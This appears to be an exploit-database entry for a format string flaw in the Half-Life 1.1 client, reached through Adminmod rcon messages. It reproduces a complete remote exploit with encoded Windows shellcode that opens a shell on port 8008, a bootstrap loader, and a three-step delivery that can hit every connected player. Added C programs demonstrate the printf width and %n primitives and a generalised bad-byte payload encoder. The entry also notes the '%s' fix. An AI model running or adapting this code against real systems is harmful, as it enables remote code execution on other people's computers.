Half-Life 1.1 Client – Server Message Format String

Vulnerability ID: 1053678    Vulnerability type: (not given)
Published: 2003-01-10    Updated: 2003-01-10
CVE: N/A
CNNVD-ID: N/A
Platform: Windows    CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/22142
|Details
Vulnerability details have not been disclosed; the exploit-db entry reproduces the SecurityFocus BID 6582 summary and the proof-of-concept below.
|Exploit
// source: http://www.securityfocus.com/bid/6582/info

// It has been reported that the Half-Life client contains a format string vulnerability. When receiving messages from an administrator through the adminmod add-on package, the client does not properly handle input: the message text reaches a printf-family function as the format string. This could result in denial of service, or code execution. The exploit below reaches the bug over rcon, so anyone holding the server's rcon password can deliver the message to one chosen player (admin_psay) or to every connected client (admin_ssay).
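// The following is an added example, not part of the exploit-db entry or of the hoagie exploit, showing in a small self-contained program the two printf properties the exploit relies on: a "%<width>u" conversion pads its output so that whatever follows lands at a chosen byte offset (the step-1 loop uses this to tile shellcode chunks into the client's buffer, each strlen+2 below the previous one because the client appends "\n\0"), and "%n" stores the number of bytes emitted so far, which "%.<k>u" sets precisely (step 3). The vulnerable sink uses the message itself as the format string; the hardened sink passes it through "%s". Assumptions made here: a client buffer of 8192 bytes, a single dummy argument standing in for the stack value the real client's printf would consume (so the demonstration is defined behaviour), an explicit local as the %n target, and fragment strings "FRAG0".."FRAG2" as constructed stand-ins for the shellcode chunks.

```c
#include <stdio.h>
#include <string.h>

#define CLIENT_BUF 8192               /* assumed size of the client's message buffer */
#define STEP1_START (5000 + 112 / 2)  /* the exploit's initial offset, 5056 */

/* Build a step-1 message exactly as the exploit does: "%<offset>u<fragment>". */
static int build_fragment_message(char *out, size_t n, unsigned offset, const char *frag)
{
    return snprintf(out, n, "%%%uu%s", offset, frag);
}

/* Vulnerable sink: the message is the format. The real client passes no
 * arguments and printf consumes whatever sits on the stack; the single 0u
 * stands in for that value. Any number printf finds has at most 10 digits,
 * so a width of several thousand absorbs it and the fragment always starts
 * at byte <offset>. */
static int vulnerable_sink(char *buf, size_t n, const char *msg)
{
    return snprintf(buf, n, msg, 0u);
}

/* Hardened sink: constant format, '%' inside msg is just data. */
static int hardened_sink(char *buf, size_t n, const char *msg)
{
    return snprintf(buf, n, "%s", msg);
}

/* The client terminates each stored message with "\n\0": the "+2" in the
 * exploit's offset arithmetic. Returns bytes in use or -1. */
static int terminate(char *buf, size_t n, int len)
{
    if (len < 0 || (size_t)len + 2 > n) return -1;
    buf[len] = '\n';
    buf[len + 1] = '\0';
    return len + 2;
}

/* Step 1 in miniature: deliver fragments from the highest offset down, each
 * strlen(frag)+2 below the previous one, then verify that every fragment is
 * still where it was put and that the "\n\0" pairs are the only separators.
 * Returns the offset of the lowest fragment, or -1 on any mismatch. */
long tile_fragments(char *buf, size_t n, const char *frags[], int count)
{
    char msg[256];
    long where[32];
    unsigned offset = STEP1_START;
    if (count > 32) return -1;
    for (int i = count - 1; i >= 0; i--) {
        build_fragment_message(msg, sizeof msg, offset, frags[i]);
        if (terminate(buf, n, vulnerable_sink(buf, n, msg)) < 0) return -1;
        where[i] = offset;
        offset -= (unsigned)strlen(frags[i]) + 2;
    }
    for (int i = 0; i < count; i++) {
        size_t len = strlen(frags[i]);
        if (memcmp(buf + where[i], frags[i], len) != 0) return -1;
        if (buf[where[i] + len] != '\n' || buf[where[i] + len + 1] != '\0') return -1;
        if (i + 1 < count && where[i] + (long)len + 2 != where[i + 1]) return -1;
    }
    return where[0];
}

long demo_tiling(void)
{
    static char buf[CLIENT_BUF];
    const char *frags[] = { "FRAG0", "FRAG1", "FRAG2" };  /* constructed stand-ins for chunks */
    return tile_fragments(buf, sizeof buf, frags, 3);
}

/* Step 3 uses "%.734u%n": %n stores the number of bytes emitted so far and a
 * precision on %u prints that many zero digits for 0, so the padding selects
 * the value written. The target is an explicit local here (literal format,
 * defined behaviour); in the client it is whatever %n finds on the stack. */
int count_written_by_n(unsigned pad)
{
    char tmp[2048];
    int n = -1;
    if (pad > sizeof tmp - 8) return -1;
    snprintf(tmp, sizeof tmp, "AA%.*u%n", (int)pad, 0u, &n);
    return n;
}

/* Returns 1 when the hardened sink keeps "%5056uFRAG" literally while the
 * vulnerable sink expands it to 5056 bytes of padding plus "FRAG". */
int sinks_differ(void)
{
    static char vuln[CLIENT_BUF], safe[CLIENT_BUF];
    char msg[64];
    build_fragment_message(msg, sizeof msg, STEP1_START, "FRAG");
    int lv = vulnerable_sink(vuln, sizeof vuln, msg);
    int ls = hardened_sink(safe, sizeof safe, msg);
    return lv == STEP1_START + 4 && ls == (int)strlen(msg) && strcmp(safe, msg) == 0;
}

int main(void)
{
    printf("lowest fragment at %ld, %%n after AA%%.734u stores %d, sinks differ: %d\n",
           demo_tiling(), count_written_by_n(734), sinks_differ());
    return 0;
}
```

// With three 5-byte fragments the lowest one lands at 5056 - 2*(5+2) = 5042, which is the same subtraction the exploit performs per chunk; the only fix the client needs is the hardened_sink form.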

/*****************************************************************
  * hoagie_adminmod_client.c
  *
  * Remote exploit for Halflife-Clients playing on a server running
  * the Adminmod plugin.
  *
  * Spawns a shell at 8008/tcp.
  *
  * Author: [email protected]
  *
  * Credits:
  *    void.at
  *    Taeho Oh for using parts of his shellcode-connection code.
  *    deepzone.org for their shellcode-generator
  *
  * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
  * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
  * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
  *
  *****************************************************************/

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>

char server_ip[20];
char rcon_pwd[30];
int server_port;
char player_nick[30];

#define STRADDR 0x19d4588

/*
-- portable NT/2k/XP ShellCode features ... www.deepzone.org

LoadLibraryA   IT address     004AC2E0h
GetProcAddress IT address     004AC164h
XOR byte                      9Fh
Remote port                   8008
Style                         C

ATTENTION code modified by greuff: 0xff in the first line
changed to 0xfe because the HL-client filters out this
character.

Wrote a short bootstrap loader that changes this byte
again to 0xff. (dec %esp, dec %esp, dec %esp, dec %esp,
pop %esi, incb 0xf(%esi))

It additionally corrects the single '%' in the code that
is filtered out by the format-string-function. (offset 0x65)

Works only when the code gets executed by a ret! (buffer-
address has to lie on the stack)

*/

// total length: 1226 bytes
char *shellcode[] = {
"\x90\x90\x90\x4c\x4c\x4c\x4c\x5e\xfe\x46\x15\xfe\x46\x6b"
"\x68\x5e\x56\xc3\x90\x54\x59\xfe\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x9f\xaa\xe2\xfa\x77\x9f\x9f\x9f\x9f",

"\xc2\x1e\x72\x46\xbe\xdf\x9f\x12\x2a\x6d\xbb\xdf\x9f\x12"
"\x22\x65\xbb\xdf\x9f\xf5\x98\x0f\x0f\x0f\x0f\xc6\x77\x4d"
"\x9d\x9f\x9f\x12\x2a\xb5\xba\xdf\x9f\x12\x22\xac\xba\xdf"
"\x9f\xf5\x95\x0f\x0f\x0f\x0f\xc6\x77\x24\x9d\x9f\x9f\xf5",

"\x9f\x12\x2a\x46\xba\xdf\x9f\xc9\x12\x2a\x7a\xba\xdf\x9f"
"\xc9\x12\x2a\x76\xba\xdf\x9f\xc9\x60\x0a\xac\xba\xdf\x9f"
"\xf5\x9f\x12\x2a\x46\xba\xdf\x9f\xc9\x12\x2a\x72\xba\xdf"
"\x9f\xc9\x12\x2a\x6e\xba\xdf\x9f\xc9\x60\x0a\xac\xba\xdf",

"\x9f\x58\x1a\x6a\xba\xdf\x9f\xdb\x9f\x9f\x9f\x12\x2a\x6a"
"\xba\xdf\x9f\xc9\x60\x0a\xa8\xba\xdf\x9f\x12\x2a\xb2\xb9"
"\xdf\x9f\x32\xcf\x60\x0a\xcc\xba\xdf\x9f\x12\x2a\xae\xb9"
"\xdf\x9f\x32\xcf\x60\x0a\xcc\xba\xdf\x9f\x12\x2a\x6e\xba",

"\xdf\x9f\x12\x22\xb2\xb9\xdf\x9f\x3a\x12\x2a\x7a\xba\xdf"
"\x9f\x32\x12\x22\xae\xb9\xdf\x9f\x34\x12\x22\xaa\xb9\xdf"
"\x9f\x34\x58\x1a\xba\xb9\xdf\x9f\x9f\x9f\x9f\x9f\x58\x1a"
"\xbe\xb9\xdf\x9f\x9e\x9e\x9f\x9f\x12\x2a\xa6\xb9\xdf\x9f",

"\xc9\x12\x2a\x6a\xba\xdf\x9f\xc9\xf5\x9f\xf5\x9f\xf5\x8f"
"\xf5\x9e\xf5\x9f\xf5\x9f\x12\x2a\xd6\xb9\xdf\x9f\xc9\xf5"
"\x9f\x60\x0a\xa4\xba\xdf\x9f\xf7\x9f\xbf\x9f\x9f\x0f\xf7"
"\x9f\x9d\x9f\x9f\x60\x0a\xdc\xba\xdf\x9f\x16\x1a\xce\xb9",

"\xdf\x9f\xac\x5f\xcf\xdf\xcf\xdf\xcf\x60\x0a\x65\xbb\xdf"
"\x9f\xcf\xc4\xf5\x8f\x12\x2a\x56\xba\xdf\x9f\xc9\xcc\x60"
"\x0a\x61\xbb\xdf\x9f\xf5\x9c\xcc\x60\x0a\x9d\xba\xdf\x9f"
"\x12\x2a\xca\xb9\xdf\x9f\xc9\x12\x2a\x56\xba\xdf\x9f\xc9",

"\xcc\x60\x0a\x99\xba\xdf\x9f\x12\x22\xc6\xb9\xdf\x9f\x34"
"\xac\x5f\xcf\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\xcf\xcf\x12"
"\x2a\x76\xba\xdf\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5"
"\xaf\x60\x0a\xd0\xba\xdf\x9f\x74\xd2\x0f\x0f\x0f\xac\x5f",

"\xcf\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\xcf\xcf\x12\x2a\x76"
"\xba\xdf\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5\xcf\x60"
"\x0a\xd0\xba\xdf\x9f\x1c\x22\xfa\xb9\xdf\x9f\x9d\x90\x1d"
"\x88\x9e\x9f\x9f\x1e\x22\xfa\xb9\xdf\x9f\x9e\xbf\x9f\x9f",

"\xed\x91\x0f\x0f\x0f\x0f\x58\x1a\xfa\xb9\xdf\x9f\x9f\xbf"
"\x9f\x9f\xf5\x9f\x14\x1a\xfa\xb9\xdf\x9f\x12\x22\xfa\xb9"
"\xdf\x9f\xc8\xcf\x14\x1a\xce\xb9\xdf\x9f\xcf\x12\x2a\x76"
"\xba\xdf\x9f\x32\xcf\x60\x0a\xd8\xba\xdf\x9f\xf5\xcf\x60",

"\x0a\xd0\xba\xdf\x9f\x14\x1a\xfa\xb9\xdf\x9f\xf5\x9f\xcf"
"\x12\x2a\xce\xb9\xdf\x9f\x32\xcf\x12\x2a\xc6\xb9\xdf\x9f"
"\x32\xcf\x60\x0a\x95\xba\xdf\x9f\xf5\x9f\x12\x22\xfa\xb9"
"\xdf\x9f\xc8\xf5\x9f\xf5\x9f\xf5\x9f\x12\x2a\x76\xba\xdf",

"\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5\xcf\x60\x0a\xd0"
"\xba\xdf\x9f\xac\x56\xa6\x12\xfa\xb9\xdf\x9f\x90\x18\xf8"
"\x60\x60\x60\xf5\x9f\xf7\x9f\xbf\x9f\x9f\x0f\x12\x2a\xce"
"\xb9\xdf\x9f\x32\xcf\x12\x2a\xc6\xb9\xdf\x9f\x32\xcf\x60",

"\x0a\x91\xba\xdf\x9f\x16\x1a\xfe\xb9\xdf\x9f\xf5\x9f\x12"
"\x22\xfa\xb9\xdf\x9f\xc8\xcf\x12\x2a\xce\xb9\xdf\x9f\x32"
"\xcf\x12\x2a\x72\xba\xdf\x9f\x32\xcf\x60\x0a\xd4\xba\xdf"
"\x9f\xf5\xcf\x60\x0a\xd0\xba\xdf\x9f\xf5\x9f\x14\x1a\xfe",

"\xb9\xdf\x9f\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\x14\x1a\xce"
"\xb9\xdf\x9f\xcf\x12\x2a\x76\xba\xdf\x9f\x32\xcf\x60\x0a"
"\xd8\xba\xdf\x9f\xf5\xcf\x60\x0a\xd0\xba\xdf\x9f\x76\x26"
"\x61\x60\x60\x12\x2a\xc6\xb9\xdf\x9f\x32\xcf\x60\x0a\x8d",

"\xba\xdf\x9f\x12\x2a\xc2\xb9\xdf\x9f\x32\xcf\x60\x0a\x8d"
"\xba\xdf\x9f\xf5\x9f\x60\x0a\xc8\xba\xdf\x9f\xce\xc9\xf7"
"\x7f\x5d\xd5\x9f\x0f\xc5\x60\x8d\xcf\xc4\xc6\xc8\xc1\xce"
"\xc9\xcc\xf7\xfb\x5e\xd5\x9f\x0f\xc5\x60\x8d\xcf\x33\x1b",

"\x5f\xea\x64\xc7\x34\xc6\x7d\x76\x5c\xc8\xcc\xd0\xdc\xd4"
"\xac\xad\x9f\xec\xf0\xfc\xf4\xfa\xeb\x9f\xfd\xf6\xf1\xfb"
"\x9f\xf3\xf6\xec\xeb\xfa\xf1\x9f\xfe\xfc\xfc\xfa\xef\xeb"
"\x9f\xec\xfa\xf1\xfb\x9f\xed\xfa\xfc\xe9\x9f\xfc\xf3\xf0",

"\xec\xfa\xec\xf0\xfc\xf4\xfa\xeb\x9f\xd4\xda\xcd\xd1\xda"
"\xd3\xac\xad\x9f\xdc\xed\xfa\xfe\xeb\xfa\xcf\xf6\xef\xfa"
"\x9f\xd8\xfa\xeb\xcc\xeb\xfe\xed\xeb\xea\xef\xd6\xf1\xf9"
"\xf0\xde\x9f\xdc\xed\xfa\xfe\xeb\xfa\xcf\xed\xf0\xfc\xfa",

"\xec\xec\xde\x9f\xcf\xfa\xfa\xf4\xd1\xfe\xf2\xfa\xfb\xcf"
"\xf6\xef\xfa\x9f\xd8\xf3\xf0\xfd\xfe\xf3\xde\xf3\xf3\xf0"
"\xfc\x9f\xcd\xfa\xfe\xfb\xd9\xf6\xf3\xfa\x9f\xc8\xed\xf6"
"\xeb\xfa\xd9\xf6\xf3\xfa\x9f\xcc\xf3\xfa\xfa\xef\x9f\xdc",

"\xf3\xf0\xec\xfa\xd7\xfe\xf1\xfb\xf3\xfa\x9f\xda\xe7\xf6"
"\xeb\xcf\xed\xf0\xfc\xfa\xec\xec\x9f\xdc\xf0\xfb\xfa\xfb"
"\xbf\xfd\xe6\xbf\xe3\xc5\xfe\xf1\xbf\xa3\xf6\xe5\xfe\xf1"
"\xdf\xfb\xfa\xfa\xef\xe5\xf0\xf1\xfa\xb1\xf0\xed\xf8\xa1",

"\x9d\x9f\x80\xd7\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x93\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9e\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f",

"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f",

"\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\xdc\xd2\xdb\xb1\xda\xc7\xda\x9f\x9f\x9f\x9f\x9f"
"\x8f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f"
"\x9f\x9f\x9f\x9f\x9f\x9f\x96\x96\x96\x96\x96\x90\x90\x90"};  // = 22 blocks

char loader[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x4c\x4c\x4c\x4c\x5a\x31\xc9\xb1\x27\x42\xe2"
"\xfd\x52\x31\xc0\x31\xc9\x66\xbb\x38\x16\x88\xf9\x51\x88"
"\xd9\x40\x8a\x3c\x42\x88\x3a\x42\xe2\xf8\x59\xe2\xf1\xc3";

/* Validates the server address and opens the UDP socket used for all rcon traffic. */
void create_conn(int *sock, char *host, int port)
{
    struct sockaddr_in sin;
    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(!inet_aton(host,&sin.sin_addr)) fprintf(stderr,"invalid server ip\n"), exit(1);
    if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1);
}

/* Sends one out-of-band packet ("\xff\xff\xff\xff" + cmd) to the server and,
   when reply is non-NULL, waits for the answer and strips the same header. */
void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply)
{
    char msg[100000];
    struct sockaddr_in sin;
    struct sockaddr_in sfrom;
    socklen_t fromlen=sizeof(sfrom);
    int n;

    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(!inet_aton(host,&sin.sin_addr)) fprintf(stderr,"invalid server ip\n"), exit(1);

    sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
    if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
       perror("sendto"), exit(1);

    if(reply)
    {
       /* callers pass 1000-byte reply buffers, so never accept more than that */
       if((n=recvfrom(sock,msg,999,0,(struct sockaddr *)&sfrom,&fromlen))<0)
          perror("recvfrom"), exit(1);
       msg[n]=0;

       if(n<4 || strncmp(msg,"\xFF\xFF\xFF\xFF",4))
          fprintf(stderr,"protocol error: reply\n"), exit(1);

       strcpy(reply,msg+4);
    }
}

/* Fetches an rcon challenge, then sends "rcon <challenge> "<pwd>" <cmd>".
   The server relays admin_psay/admin_ssay output to the targeted client(s). */
void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun)
{
    char reply[1000];
    char msg[100000];

    lowlevel_rcon(sock,host,port,"challenge rcon",reply);
    if(!strstr(reply,"challenge rcon "))
       fprintf(stderr,"protocol error\n"), exit(1);
    if(strlen(reply)) reply[strlen(reply)-1]=0;   /* drop the trailing newline */

    sprintf(msg,"rcon %s \"%s\" %s",reply+strlen("challenge rcon "),rconpwd,cmd);
    if(reply_fun)
       lowlevel_rcon(sock,host,port,msg,reply);
    else
       lowlevel_rcon(sock,host,port,msg,NULL);
    if(reply_fun)
       strcpy(reply_fun,reply);
}

int main(int argc, char **argv)
{
    int sock, i;
    unsigned int j;
    char reply[1000], command[100];
    char evil_message[100000];
    unsigned int offset, spaces;
    unsigned long addr;

    printf("hoagie_adminmod_client - remote exploit for half-life-clients\n");
    printf("by [email protected]\n\n");
    if(argc<4 || argc>5)
    {
       printf("Usage: %s server_ip server_port rcon_password [player_nick]\n\n",argv[0]);
       exit(1);
    }

    snprintf(server_ip,sizeof(server_ip),"%s",argv[1]);
    server_port=strtol(argv[2],NULL,10);
    snprintf(rcon_pwd,sizeof(rcon_pwd),"%s",argv[3]);
    if(argc==5)
    {
       snprintf(player_nick,sizeof(player_nick),"%s",argv[4]);
       sprintf(command,"admin_command admin_psay \"%s\"",player_nick);
    }
    else
    {
       player_nick[0]=0;
       sprintf(command,"admin_command admin_ssay");
    }

    if(player_nick[0]==0)
    {
       printf("Sending to ALL clients! You have 3 sec to abort...\n");
       sleep(3);
    }

    create_conn(&sock,server_ip,server_port);

    /********* Step 1 - send the complete shellcode and the loader to the big buffer ***********/

    /* Each message is "%<offset>u<chunk>": the width padding places the chunk
       at byte <offset> of the client's buffer. Chunks are sent from the
       highest offset downwards so that a later (shorter) message never
       overwrites an earlier chunk. */
    offset=5000+112/2;
    spaces=0;
    for(i=21;i>=0;i--)
    {
       sprintf(evil_message,"%s ",command);
       for(j=0;j<spaces;j++)
          strcat(evil_message," ");
       sprintf(reply,"%%%uu%s",offset,shellcode[i]);
       strcat(evil_message,reply);

       printf("Writing shellcode fragment at offset %u...\n",offset);
       send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
       offset-=strlen(shellcode[i])+2;   // including \x0a\x00
    }

    /********* Step 2 - send the shellcode bootstrap loader ***********/

    /* correct offset because the shell loader has the double size of a shellcode chunk */
    offset-=strlen(shellcode[0]);
    sprintf(evil_message,"%s ",command);
    for(j=0;j<spaces;j++)
       strcat(evil_message," ");
    sprintf(reply,"%%%uu%s",offset,loader);
    strcat(evil_message,reply);

    printf("Writing bootstrap at offset %u...\n",offset);
    send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);

    /********* Step 3 - construct the code that returns into the shellcode ************/

    /* "push <addr>; ret" (68 imm32, c3) sits in the message itself; the five
       "%.f" pop stack slots, "%.734u" sets the byte count and "%n" writes it. */
    addr=STRADDR+offset+73+spaces;
    sprintf(evil_message,"%s AA%c%c%c%c%c%c%%.f%%.f%%.f%%.f%%.f%%.%du%%n",
         command,
         0x68,(int)(addr&0xFF),(int)((addr>>8)&0xFF),(int)((addr>>16)&0xFF),(int)((addr>>24)&0xFF),0xc3,734 /* 0x3cd-13 */);
    printf("Writing return into shellcode instructions...\n");
    send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);

    close(sock);

    printf("Shell (hopefully) spawned at client host port 8008.\n");
    return 0;
}
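Added example, not from the page or from the exploit's author: the byte-filtering problem the source comment describes (0xff dropped by the client, '%' eaten by the format-string sink) solved the way the first 14 bytes of the shellcode above solve it, generalised to any number of slots. Each bad byte is stored as byte-1 and its position recorded; the emitted prologue is 90 90 90 4c 4c 4c 4c 5e (three nops, four "dec %esp" so that "pop %esi" reloads the buffer address the entering "ret" just consumed) followed by one fe 46 disp8 ("incb disp8(%esi)") per slot; a decoder then applies those increments and the result is compared with the original. The sample body is constructed here, 0x90 filler with a 0xff at index 7 and a '%' at index 93, which reproduces the page's displacements 0x15 and 0x6b. Treating 0x00 and '\n' as bad bytes as well is an assumption, based on the exploit's use of strlen() and the client's "\n\0" terminator.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bytes that do not survive the path to the format-string sink. 0xff and '%'
 * come from the page; 0x00 and '\n' are assumed (strlen() and "\n\0"). */
static const unsigned char BAD_BYTES[] = { 0xff, '%', 0x00, '\n' };

static int is_bad(unsigned char b)
{
    for (size_t i = 0; i < sizeof BAD_BYTES; i++)
        if (BAD_BYTES[i] == b) return 1;
    return 0;
}

/* nop nop nop; dec %esp x4; pop %esi -- %esi now holds the buffer address. */
#define PROLOGUE_HEAD_LEN 8
static const unsigned char PROLOGUE_HEAD[PROLOGUE_HEAD_LEN] =
    { 0x90, 0x90, 0x90, 0x4c, 0x4c, 0x4c, 0x4c, 0x5e };

/* Every bad byte becomes byte-1 and its index is recorded. Returns the number
 * of slots, or -1 when byte-1 is itself bad or the slot table is full. */
static int encode_body(const unsigned char *in, size_t n, unsigned char *out,
                       size_t *slots, size_t max_slots)
{
    size_t ns = 0;
    for (size_t i = 0; i < n; i++) {
        out[i] = in[i];
        if (!is_bad(in[i])) continue;
        unsigned char sub = (unsigned char)(in[i] - 1);
        if (is_bad(sub) || ns == max_slots) return -1;
        slots[ns++] = i;
        out[i] = sub;
    }
    return (int)ns;
}

/* Prologue + encoded body. Displacements are measured from the prologue start
 * (where %esi points), so body index i is at PROLOGUE_HEAD_LEN + 3*ns + i;
 * the disp8 form limits that to 127 and the disp byte must itself be clean.
 * Returns the total length or -1. */
static int build_payload(const unsigned char *body, size_t n, unsigned char *out, size_t max)
{
    size_t slots[16];
    unsigned char enc[4096];
    if (n > sizeof enc) return -1;
    int ns = encode_body(body, n, enc, slots, 16);
    if (ns < 0) return -1;
    size_t plen = PROLOGUE_HEAD_LEN + 3 * (size_t)ns;
    if (plen + n > max) return -1;
    memcpy(out, PROLOGUE_HEAD, PROLOGUE_HEAD_LEN);
    for (int k = 0; k < ns; k++) {
        size_t disp = plen + slots[k];
        if (disp > 127 || is_bad((unsigned char)disp)) return -1;
        out[PROLOGUE_HEAD_LEN + 3 * k]     = 0xfe;   /* incb disp8(%esi) */
        out[PROLOGUE_HEAD_LEN + 3 * k + 1] = 0x46;
        out[PROLOGUE_HEAD_LEN + 3 * k + 2] = (unsigned char)disp;
    }
    memcpy(out + plen, enc, n);
    for (size_t i = 0; i < plen + n; i++)     /* nothing filterable may remain */
        if (is_bad(out[i])) return -1;
    return (int)(plen + n);
}

/* What the CPU does before reaching the body: walk the fe 46 dd entries and
 * increment the byte each one points at. Returns the body offset or -1.
 * (A body that itself begins with fe 46 would need an explicit slot count.) */
static int apply_prologue(unsigned char *payload, size_t len)
{
    size_t p = PROLOGUE_HEAD_LEN;
    if (len < p || memcmp(payload, PROLOGUE_HEAD, p) != 0) return -1;
    while (p + 3 <= len && payload[p] == 0xfe && payload[p + 1] == 0x46) {
        size_t disp = payload[p + 2];
        if (disp >= len) return -1;
        payload[disp]++;
        p += 3;
    }
    return (int)p;
}

#define BODY_LEN 100
/* Constructed sample body, not the page's shellcode. */
static void sample_body(unsigned char *b)
{
    memset(b, 0x90, BODY_LEN);
    b[7] = 0xff;
    b[93] = '%';
}

int demo_build(unsigned char *out, size_t max)
{
    unsigned char body[BODY_LEN];
    sample_body(body);
    return build_payload(body, BODY_LEN, out, max);
}

/* 1 when applying the prologue restores the original body byte for byte. */
int demo_roundtrip(void)
{
    unsigned char body[BODY_LEN], out[256];
    sample_body(body);
    int len = build_payload(body, BODY_LEN, out, sizeof out);
    if (len < 0) return 0;
    int start = apply_prologue(out, (size_t)len);
    return start > 0 && (size_t)(len - start) == BODY_LEN && memcmp(out + start, body, BODY_LEN) == 0;
}

int main(void)
{
    unsigned char out[256];
    int len = demo_build(out, sizeof out);
    printf("payload %d bytes, prologue:", len);
    for (int i = 0; i < 14 && i < len; i++) printf(" %02x", out[i]);
    printf("\nroundtrip ok: %d\n", demo_roundtrip());
    return 0;
}
```

The final scan in build_payload is the check worth keeping in any delivery tool of this kind: a displacement or substituted byte that is itself filtered would be silently corrupted in transit, and the prologue would patch the wrong location.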
